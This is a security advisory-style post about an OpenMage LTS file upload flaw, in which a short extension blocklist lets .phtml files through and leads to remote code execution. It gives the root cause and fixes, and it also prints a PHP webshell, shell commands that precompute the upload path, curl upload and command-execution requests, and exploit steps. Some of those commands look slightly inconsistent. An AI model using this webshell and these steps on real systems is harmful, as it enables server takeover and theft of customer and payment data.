OpenMage LTS, Incomplete File Extension Blocklist leading to Remote Code Execution (Critical)

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in the product custom option file upload handler. OpenMage LTS uses an incomplete blocklist (forbidden_extensions = php,exe) to reject dangerous files. This list misses many PHP-executable extensions like .phtml, .phar, .php3, .php4, .php5, .php7, and .pht. The upload logic (in `File.php` lines 230-237) applies an `ExcludeExtension` validator using only that short list, allowing the bypass. Files are stored in `media/custom_options/quote/` with a deterministic path: subdirectory from first two characters of the original filename, and filename = MD5(file contents) + original extension. Since the attacker controls both the filename prefix and the payload, the final URL can be precomputed. On servers where that directory permits script execution (e.g., Apache+PHP-FPM or misconfigured Nginx), uploading a `.phtml` webshell leads to Remote Code Execution. The root cause is missing the comprehensive `protected_extensions` blocklist defined elsewhere in `core/etc/config.xml` (php, php3, php4, php5, php7, pht, phtml, etc.). The vulnerable code does not fall back to that list, leaving a trivial bypass. Attackers can upload a webshell, compute its MD5 hash, and directly access the file via the precomputed URL to execute system commands.

dailycve form:

Platform: OpenMage LTS
Version: All prior LTS
Vulnerability: File extension bypass
Severity: Critical
date: 2026-04-21

Prediction: Q2 2026 patch

What Undercode Say:

Compute deterministic path for uploaded webshell
SHELL='<?php echo exec("id"); system($_GET["cmd"]??"id"); ?>'
HASH=$(echo -n "$SHELL" | md5sum | cut -d' ' -f1)
PREFIX=$(echo "shell" | cut -c1-2 | sed 's/./&\//g' | tr -d '\n' | sed 's/\/$//')
URL="https://target.com/media/custom_options/quote/${PREFIX}/${HASH}.phtml"
echo "Precomputed URL: $URL"
Upload bypass using .phtml
curl -X POST "https://target.com/vulnerable_upload.php" \
-F "[email protected];filename=shell.phtml"
Execute command
curl "$URL?cmd=whoami"

Exploit:

1. Craft `.phtml` webshell.

2. Upload via product custom option file field.

3. Compute MD5 of shell content.

4. Access `media/custom_options/quote/s/h/.phtml`.

5. Append `?cmd=id` to achieve RCE.

Protection from this CVE

  • Update OpenMage LTS to patched version (>=20.0.23).
  • Manually extend `forbidden_extensions` to include phtml,phar,php3,php4,php5,php7,pht.
  • Configure `media/custom_options/quote/` to disable script execution (e.g., `.htaccess` with `php_flag engine off` or Nginx location ~ \.php$ { return 403; }).
  • Use a Web Application Firewall to block known malicious extensions.

Impact:

  • Remote Code Execution (full server compromise)
  • Data exfiltration (database credentials, customer PII, payment data)
  • Lateral movement to internal infrastructure
  • Supply chain attack via malicious code injection

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top